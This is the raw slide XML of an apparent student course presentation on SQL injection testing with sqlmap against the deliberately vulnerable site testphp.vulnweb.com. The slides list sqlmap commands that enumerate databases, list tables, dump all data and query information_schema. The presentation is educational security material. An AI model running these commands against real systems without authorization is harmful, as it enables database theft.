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004d520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004d520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004d5204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004d520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004d520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004d520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004d5204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004d5204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004d5204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004d5204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004d5204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004d520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7875" y="726475"/>
            <a:ext cx="8177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imes New Roman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Injection Testing using SQLmap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" name="Google Shape;55;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516900" y="1308825"/>
            <a:ext cx="81102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Security(ITMS-528-01),Illinois Institute of technology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 and Management, Illinois Institute of technology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Bhargava Reddy Kikkura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Bharath Kumar Uppala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Hari Kiran Gaddam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Bharath Viswa Teja Vidya Charan Maddala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Rajabinandhan Periyagoundanoor Gopal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5525" y="276500"/>
            <a:ext cx="4287649" cy="29155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42713" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="280575" y="2735948"/>
            <a:ext cx="4566976" cy="2122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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218100" y="893650"/>
            <a:ext cx="43539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Scouting The Target Website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“http://testphp.vulnweb.com/listproducts.php?cat=1”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976500" y="3387900"/>
            <a:ext cx="39267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Trying URL Parameter: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http://testphp.vulnweb.com/listproducts.php?cat=’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4019" l="0" r="49811" t="-4020"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5173725" y="791063"/>
            <a:ext cx="3804550" cy="3561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" name="Google Shape;69;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152325" y="1442550"/>
            <a:ext cx="50214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Nmap on the target Website </a:t>
            </a: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parameters -u followers target website </a:t>
            </a:r>
            <a:b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sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs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23575" y="2571750"/>
            <a:ext cx="48789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Acurat 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Information_Scheman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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50119" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5215306" y="1741838"/>
            <a:ext cx="3765276" cy="28684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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="71550" y="855575"/>
            <a:ext cx="59928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use -D to select the specific database </a:t>
            </a:r>
            <a:b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-tables to extract the all the table data</a:t>
            </a:r>
            <a:b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sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart –tables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11400" y="1698425"/>
            <a:ext cx="37653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Artists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Carts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Featured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Guestbook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Pictures products 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29750" y="325550"/>
            <a:ext cx="6146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use -a to fetch all the data available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sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables –a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94150"/>
            <a:ext cx="6254825" cy="387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29750" y="325550"/>
            <a:ext cx="7625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further filter the information by selecting specific tables and columns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sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D information_schema --tables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325" y="1094150"/>
            <a:ext cx="6909351" cy="376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78950" y="442125"/>
            <a:ext cx="87861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we will use the following command to find the ADMINISTRABLE_ROLE_AUTHORIZATIONS </a:t>
            </a:r>
            <a:b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sqlmap -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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http://testphp.vulnweb.com/listproducts.php?cat=1 -D information_schema -T ADMINISTRABLE_ROLE_AUTHORIZATIONS -columns</a:t>
            </a:r>
            <a:endParaRPr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675" y="1261125"/>
            <a:ext cx="6938651" cy="3725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